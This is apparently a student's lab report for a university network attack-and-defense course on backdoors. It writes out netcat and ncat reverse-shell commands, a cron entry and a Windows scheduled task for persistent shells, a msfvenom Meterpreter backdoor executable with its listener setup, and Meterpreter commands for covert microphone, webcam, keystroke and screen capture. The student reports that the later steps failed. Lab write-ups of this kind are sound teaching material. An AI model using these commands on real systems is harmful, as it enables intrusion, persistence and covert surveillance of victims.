2019-2020 2《网络对抗技术》20175235 Exp2 后门原理与实践

20175235 《网络对抗技术》实验二 后门原理与实践

20175235泽仁拉措

目录:

(1)使用netcat获取主机操作Shell，cron启动

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

(5)基础问题回答及实验心得

1.基础知识总结
（1）后门：是不经过正常认证流程而访问系统流程的通道。

（2）常见后门有：编译器后门、操作系统后门、应用程序后门、潜伏或伪装成特定应用的专用后门程序。

（3）布置后门的流程：<1>有一个后门程序；<2>将其放置在系统里；<3>使后门程序代码运行起来；<3>不被查杀软件查杀且不被防火墙发现。（常用技术有：反弹式连接；加密技术；隧道技术）。

（4）常用后门工具：

<1>netcat:又名nc、ncat。是一个底层工具，进行基本的TCP.UDP数据收发，常与其他工具结合使用作为后门。

Linux：自带netcat，输入man nc查看其使用说明。

Windows: 下载ncat.rar工具包。
一、Win获得Linux Shell
先下载ncat到主机，将其解压到d:/ncat,在主机的cmd输入ipconfig查找主机ip
①首先在Windows中使用 ipconfig 查看主机IP地址

②在cmd进入ncat所在的文件夹，输入命令ncat.exe -l -p 8888并运行
③在linux终端中输入nc 192.168.153.1 8888 -e /bin/sh：

④此时Win已经获得Linux Shell，如图所示：

二、Linux获得Win Shell
①在linux终端中输入ip add查看ip

②输入nc -l -p 8888使其处于监听状态
在主机的cmd还是打开之前的ncat文件夹，输入ncat.exe -e cmd.exe192.168.153.128 8888
再看linux已经出现了win的命令提示：

实验内容

一、使用netcat获取主机操作Shell，cron启动

1.crontab -e指令增加一条定时任务，-e表示编辑。

2.在最后一行添加1 * * * * /bin/netcat 192.168.153.1 8888 -e /bin/sh

3.当时间到了，此时已经获得了Kali的shell，可以输入指令ls

二、使用socat获取主机操作Shell, 任务计划启动

1.在主机中找到控制面板-系统与安全-管理工具-任务计划程序，选择创建任务

2.选择新建触发器，设置相应触发的时间

3.在操作中选择每次需要执行的程序或脚本

4.看到任务的状态为准备就绪

5.此时可以看到任务的状态为正在运行，同时会弹出一个cmd窗口

6.在kali中输入指令socat - tcp:192.168.:8888

此时可以发现已经成功获得了一个shell，下图为输入dir的结果

三、使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

1.在kali中生成后门程序meter_backdoor.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.40.132 LPORT=5311 -f exe > meter_backdoor.exe

2.将后门程序拷贝到Win10中,在kali中打开MSF监听程序msfconsole

依次输入use exploit/multi/handler，set payload windows/meterpreter/reverse_tcp，set LHOST 192.168.40.132，set LPORT 5311等命令进行配置。

3.在win10中打开meter_backdoor.exe后门程序。

在kali中输入exploit就能得到入侵成功的结果。

四、使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

1.使用record_mic指令可以截获一段音频

2.使用webcam_snap指令可以使用摄像头进行拍照

3.使用keyscan_start指令开始记录下击键的过程，使用keyscan_dump指令读取击键的记录

4.使用screenshot指令可以进行截屏

五、基础问题回答及实验心得

基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式？
答：下载了软件有恶意代码违背杀毒软件成功查杀，则该后门成功进入到我的系统中。

(2)例举你知道的后门如何启动起来(win及linux)的方式？
答：1.开机自启动技术；

​ 2.windows定时任务；

​ 3.木马化正常软件。

(3)Meterpreter有哪些给你映像深刻的功能？
答：Meterpreter是一个后门平台

(4)如何发现自己有系统有没有被安装后门？
答：查看注册表、进程、端口情况，使用杀毒软件进行查杀。

3.2.实验总结与体会
答：我做到第三步，就怎么也不行，查了很多，都不行，以至于第四个实验也做不了，决定先把博客交了再找找有什么方法，把没做出来的补上。